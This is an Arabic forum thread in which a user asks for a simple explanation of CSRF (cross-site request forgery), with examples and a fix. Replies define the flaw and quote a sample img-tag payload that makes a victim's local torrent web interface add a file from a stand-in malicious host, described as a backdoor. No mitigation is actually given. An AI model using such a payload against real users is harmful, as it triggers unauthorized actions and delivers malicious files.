• 0

من يشرح لنا بشكل مبسط ثغرة csrf مع اعطاء امثلة وايضا الطريقة المثلى لكيفية ترقيعها؟

من يشرح لنا بشكل مبسط ثغرة csrf مع اعطاء امثلة وايضا الطريقة المثلى لكيفية ترقيعها

انشر على الشّبكات الاجتماعية


رابط هذه المساهمة
  • 0

وهي اختصار لـ Cross-site request forgery وتدعى هذه الثغرة باللغة العربية بثغرة تزوير الطلب عبر المواقع، وهي عبارة عن تمرير أوامر غير مرخصة بها من المستخدم الذي يثق به الموقع إليه، ولقد اكتشفت هذه الثغرة سنة 2001.

مثال على هذه الثغرة:

<img src="http://localhost:8080/gui/?action=add-url&s=http://evil.example.com/backdoor.torrent">

حيث أنه عند فتح هذه الصفحة سيتم فتح باب خلفي كما هو ظاهر حيث تم تمرير رابط خبيث إلى الصورة ولم يتم التأكد من محتويات وسم الصور.

انشر على الشّبكات الاجتماعية


رابط هذه المساهمة
  • 0
بتاريخ On 15‏/2‏/2016 at 20:31 قال هشام رزق الله:

مثال على هذه الثغرة:


<img src="http://localhost:8080/gui/?action=add-url&s=http://evil.example.com/backdoor.torrent">


حيث أنه عند فتح هذه الصفحة سيتم فتح باب خلفي كما هو ظاهر حيث تم تمرير رابط خبيث إلى الصورة ولم يتم التأكد من محتويات وسم الصور.

سمعت عن ثغرة شبيهة تخص الويندوز و بالتحديد متصفح IE حيث يتم تضمين كود جافاسكريب بذاخل ملف الصورة .

بالنسبة للمثال المرفق هل الرابط بشكله الحالي لازال يشكل خطر على المستدمين ام تم حل هذه الثغرة !

انشر على الشّبكات الاجتماعية


رابط هذه المساهمة

يجب أن تكون عضوًا لدينا لتتمكّن من التعليق

انشاء حساب جديد

يستغرق التسجيل بضع ثوان فقط


سجّل حسابًا جديدًا

تسجيل الدخول

تملك حسابا مسجّلا بالفعل؟


سجّل دخولك الآن